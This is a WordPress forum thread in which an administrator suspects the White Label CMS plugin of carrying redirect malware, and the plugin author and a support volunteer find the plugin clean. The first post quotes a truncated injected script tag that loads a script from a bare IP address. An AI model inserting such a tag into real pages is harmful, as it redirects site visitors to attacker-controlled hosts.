Forums

WordPress › Support » Plugins and Hacks

White Label CMS
[resolved] Malware in Download? (4 posts)

  1. berniecombs
    Member
    Posted 4 months ago #

    I've been chasing some redirect malware out of sites I administer and there appears to be some malicious code within your current 1.4.3 download. I've deleted the current version plugin from the sites, removed all related files and done a "clean" install from the WP Plugins page and back it comes... deactivate the plugin, and it's gone. Reactivate it and it's back immediately. Here's what it looks like in FireBug... I've abbreviated the redirected script id as not to pass along malicious script:

    <script src="http://gordonbonham.com/wp-content/plugins/white-label-cms/scripts/wlcms_script.js?ver=1.4.3" type="text/javascript">
<style type="text/css">
<style media="print" type="text/css">
<style type="text/css">
<script id="dgllhguk" src="http://91.196.216.64/s.php?ref=http%3A...

    Please check it out and advise.

    Thanks.

    Bernie

    http://wordpress.org/extend/plugins/white-label-cms/

  2. VideoUserManuals
    Member
    Posted 4 months ago #

    Hi Bernie

    I have just downloaded from the repo the latest version - and there is no javascript or code like you have pasted

    There must be something else causing it? Have you located where the hacked files are located on the server?

    Thanks

  3. Mark (podz)
    Support Maven
    Posted 4 months ago #

    I have just downloaded and checked the plugin - it's good.

    Please send the full details to plugins@wordpress.org
    Thanks

  4. berniecombs
    Member
    Posted 4 months ago #

    Good to know. Sorry if I sent up a false alarm. This stuff is driving me crazy. Thanks for taking a peek. Love the plugin.

Reply

You must log in to post.

About this Plugin

About this Topic

Tags